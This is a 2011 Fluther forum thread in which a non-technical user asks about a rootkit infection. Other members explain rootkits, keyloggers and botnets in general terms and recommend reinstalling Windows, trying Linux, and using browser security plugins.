General Question

woodcutter's avatar

For tech wizards here: Have you heard of the Root Kit virus that is out there now?

Asked by woodcutter (16249 points ) September 29th, 2011

Apparently I stumbled into it and my machine got lit up, No I haven’t been on dirty sites. We have a contract with Cyber Defender and they have been working on this. They have been aware of its existence for some time now. And they aren’t sure they can crack it, any time soon. I’m so glad I kept this Windows 98 machine sitting back in the corner of the room. Windows ‘98 sucks.
Is our computer toast?

Observing members: 0 Composing members: 0

19 Answers

Lightlyseared's avatar

Have you got all the data on your PC backed up? Yes….Do you have the original instal disks for windows? Then the easiest way to get rid of pretty much any virus is to format the drive and do a clean install of windows.

King_Pariah's avatar

If it’s a “well written” root, yeah your comp may be royally screwed with the only real way of getting rid of it being wiping your computer then downloading your/a new OS. If it’s not, then a good antivirus program on your comp should be able to clear it no praw.

woodcutter's avatar

Yes the techs we spoke with say this machine will have to be wiped and started from scratch. We do have it backed up because of a power outage a while back it suffered through a similar thing happened. It was left on as the power failed but to this day I don’t understand why that would do anything. If it goes off due to power failure, it’s off and won’t come back on until we turn it back on manually, but what do I know? I haven’t heard of this on the news like some viruses or worms we get warnings for. I have no idea when this got me. I was under the impression Cyber Defender would catch stuff like this but I guess that was false security on my part.

the100thmonkey's avatar

Root kits can be pretty hard to detect and defend against, particularly if the security flaw that they exploit is unpatched.

There’s a good article on them here.

Rootkits can be installed a variety of ways, not just shitty porn sites.

koanhead's avatar

A rootkit is not the same as a virus, though it can be installed by a virus. A rootkit allows a remote attacker or a malicious program privileged access to your system (with “Administrator” or “root” privileges, that is, full access to the file system and every other part of the computer.) Once an attacker has privileged access to your system it is very difficult to remove that access.

(I see that @100thmonkey has beat me to the link above, but I don’t know a better article.)

You can’t depend on commercial products alone to ensure your computing security. You have to learn about it yourself and use good habits or you will be compromised eventually. It is only a matter of time.

For Windows users it’s not even worth trying to repair the damage- just reinstall, or better yet upgrade.

woodcutter's avatar

Since I know so little about computers, I don’t even know what I don’t know. I knew prior to putting this q in here my eyes were going to glaze over reading the replies but I still am grateful for what I have gotten so far and It’s going to help some I’m sure. We have something to discuss with CD when we get with them again.

Another silly question,What were the writers of this fresh new hell trying to accomplish doing this if not to be a pain in the balls? Banking passwords or other ways to get some form of compensation? I don’t think they can get anything from us that way, our personal lives/business aren’t tied into all this, or are they?

King_Pariah's avatar

New? It isn’t new, I’ve been hearing about these since 2004. And yeah, it’s just a big nice pain in the ass which can result in info being stolen. And pretty much whatever you have on the comp can be stolen. And they can download a program that could allow them to pick up all the keys you pressed over time. As you can imagine, if you do online banking, this could be disastrous.

gorillapaws's avatar

It might be worth looking into Linux. It’s safer, prettier, and cheaper (i.e. free) than a windows upgrade. If you just use your machine for the basics, this might be a great alternative to try.

the100thmonkey's avatar

Good answers above. I’d add to @gorillapaws and @koanhead‘s points by saying that the best anti-malware software is between the keyboard and the chair – you.

It’s impossible to screen everything at the software level, and an apparently safe website can be compromised to drop viruses and rootkits onto your machine without the knowledge of the owners. Many rootkits are there to hide the activities of another piece of malware from the system’s security software. Despite this, simple things like hovering over a link in an email to see whether the target page actually corresponds with the link, and thinking twice before opening a downloaded file can prevent many problems.

As @gorillapaws recommends, I too would suggest Ubuntu as a good alternative to Windows, it’s very simple and easy to use, and can be installed alongside your current Windows OS so you can go back if you dislike it. It’s also a much tighter OS in terms of security. Try it!

Brian1946's avatar

@gorillapaws @the100thmonkey

It’s moments like these that bring joy to the hearts of Jane Goodall and the supporters of Dian Fossey. ;-)

the100thmonkey's avatar

@@q ^ ^ p@@
@@(|’‿’|)@@

edit

Hey! Who turned off monospace rendering?

To see the picture as it should be seen, copy the symbols in the post into the answer box.

koanhead's avatar

@woodcutter One of the possible uses of a rootkit is to install software on the victims’ computers that performs tasks that benefit the perpetrator. For example, it could install a keylogger that harvested your passwords and other personal information in order to use your identity as a cover for illegal activity. Or it could cause your computer to become part of a “botnet”, a group of compromised computers typically used to perform concentrated attacks on larger networks.

woodcutter's avatar

Oh man. I really can’t think of anything I did to get this. What got me wondering was at times when I know one mouse click would do, it was taking 2 or 3 to get it done, but it was a newish mouse that was cordless and figured the batteries were getting old. But after putting new batts in nothing improved.The comp was acting slower than usual so we got in touch with CD to figure this out and when they got done with us we had no internet at all. What the hell !? I got talked into installing WOT a couple weeks ago to have a heads up for untrustworthy sites and it was shortly after things gradually got weird. Not saying that was any problem but I thought I felt I was doing everything I could to stay out of trouble. But we uninstalled it before the web went out just because. It looked like it was on the up & up.

When someone sets one of these into action do they have a particular victim in mind or do they let it out and the attacks are hit or miss randomly?

koanhead's avatar

@woodcutter Why would you think World Of Tanks would help with security?

Just kidding. By WOT do you mean Web of Trust? That seems like an interesting tool, though I don’t use it. Anonymous crowdsourcing is not a good way to construct a Web of Trust (that’s a different link) because you can’t trust anonymous strangers pretty much by definition. I haven’t read up on the program enough to know how it actually works, but the website indicates that it tracks the users to accomplish this. That’s not good, and it’s not enough. The program does not seem to be open source, so you have to trust the developers that it does what they say it does.

Also, it seems like the WOT program tracks all this activity in a single centralized database. That’s a problem since it’s a single point of failure and potentially vulnerable to MITM – an attacker could poison site ratings that way. Not only that, but how do we know we can trust the maintainers of that database? We thought we could trust the HTTPS certificate authoritieslook how that turned out.

Basically, trust-based security is a Good Thing, but trust has to be handled properly. You don’t sign a key unless you know that person AND you have verified their picture ID or some other official ID method. The system has to properly handle trust transitivity (Alice trusts Bob, Bob trusts Carol, so Alice trusts Carol a little) and it needs to be Free and open. Ideally it should be perfectly transparent and every user should have perfect knowledge of the system, but that’s an impossible ideal- so we do the best we can with PGP and the like.

Okay, rant over. Folks, HTTPS is fundamentally broken, but right now it’s what we have, and I still recommend the HTTPS-Everywhere plugin to anyone using a browser (and if your browser doesn’t support it, you should consider switching to one that does.) In a few years we’ll have better tools deployed- most ISPs won’t deploy IPv6 without IPSEC if they do it at all, and DNSSEC should finally remove the cache-poisoning problem once and for all (in addition to possibly replacing HTTPS, assuming you can trust in-addr.arpa).

Finally, to answer your question, malware attacks on PCs are often done in a “shotgun”-style approach. The black hats don’t know or care what’s on your computer, usually they just want to take over one that has network access. That’s because they have in mind attacking a big site like a bank or other company. With a botnet they can overwhelm a company’s Web servers and make their web pages error out so no one can use them. To make a botnet they need as many computers as possible, so they spread malware everywhere they can.
Finally, you said you hadn’t been to any suspicious sites. This assumes that you can know which sites are suspicious (WOT, right?) which would not necessarily be the case even if WOT worked perfectly all the time:

It’s possible for an attacker to take over another site’s url with a technique called cache poisoning – this means you could point your browser to google.com and get a fake site run by someone else. If they did it skillfully enough, you’d never know it wasn’t Google. (This probably wouldn’t work with Google- but the attack on DigiNotar did!). There’s nothing much you as a user can do about this unless you know more about DNS than most.

Also, some sites use something called cross-site scripting or XSS which can silently redirect you to another site or cause your browser to download data from that site. In many cases XSS in innocuous- for example, many OpenID client sites use it to authenticate you against your OpenID provider- but it has many many nefarious uses. It’s also possible for an otherwise reputable site to have these scripts “injected” into their content against their will.
To defend against this I recommend the NoScript plugin. It is pretty flexible, but it blocks pretty much all scripts by default (which means embedded videos won’t work, and Fluther would look totally broken). You have the option of allowing scripts from some sources but not others (for example, if you were on fluther you could choose to allow from fluther.com and quantserve.com but deny from yahooapis.com). It’s good. Everyone should use it.

Well, I see I’ve written a bit of a book here. Hopefully no one will fall asleep halfway through. If it’s boring, I apologize- but I haven’t had my coffee yet!

woodcutter's avatar

@koanhead Hey no don’t sweat the longish reply. I think topics likwe this are impossible to explain in an abbreviated format although if someone doesn’t understand the basics of it ,there will be a need to get help using all the ideas gathered and hopefully the people chosen to assist will make assessments in the user’s best interest. I just happen be be caught in that generational group that never had computers growing up or even needed them for a job, or school. There are still a few of us out there. There will be things that are intuitive enough to get and then there are the ones that will fly right over my head, like computers, and cell phones, DVD players. I’m so glad that VCR’s are about gone because I never understood them either. If an invention isn’t put into action by physically swinging something, Imma gonna be in trouble.

the100thmonkey's avatar

@woodcutter – this is not intended as an attack, rather a friendly criticism: if you decide that it is all over your head, it is.

If, on the other hand, you decide that it’s both understandable and actually quite simple, it is.

You just need to break it down, or find a suitable source where all the technical jragon is broken down for you. Again, not a criticism, but @koanhead‘s response, while impeccably correct, is rather technical. The issue is breaking up what is a very good post into chunks that a novice user can work with. If you wish, I will try to do so tomorrow, for it’s late and I’m tired, and I need @koanhead‘s help to do it properly.

koanhead's avatar

@the100thmonkey That last response of mine was not meant to be any sort of general guide, just some musings on the current state of things with some links I hoped folks would find useful.
If you and other folks think that a basic sort of guide to network security would be useful, I’d be happy to work one up in the next couple of days and perhaps post a link in my profile or some such. If you’d like to collaborate on it your input would be most welcome. Otherwise I think I’ll write it up in one of my blogs later this weekend and then link to it.

woodcutter's avatar

I really didn’t feel I was being made sport of. I knew before doing this there were going to be things offered that may confuse me. I’m a big boy but I’m old,but mostly big.

lightsourcetrickster's avatar

I notice WOT getting thrown into the mix there. WOT is not as trustworthy as it appears to be. There have been articles on this matter
http://www.resourcesforlife.com/docs/item5706 being one such article.
The problem with that is that, as stated, it’s open to abuse.
I did use it at one point and I will say I did a lot of digging around when I first started reading stories about it, and basically I uninstalled WOT pretty quickly. I wouldn’t bother using it – not because I run a web based business (I don’t as a matter of fact), but because there is simply far too much abuse being gotten away with. Web of Trust to that extent is a no-no.

Answer this question

Login

or

Join

to answer.

This question is in the General Section. Responses must be helpful and on-topic.

Your answer will be saved while you login or join.

Have a question? Ask Fluther!

What do you know more about?
or
Knowledge Networking @ Fluther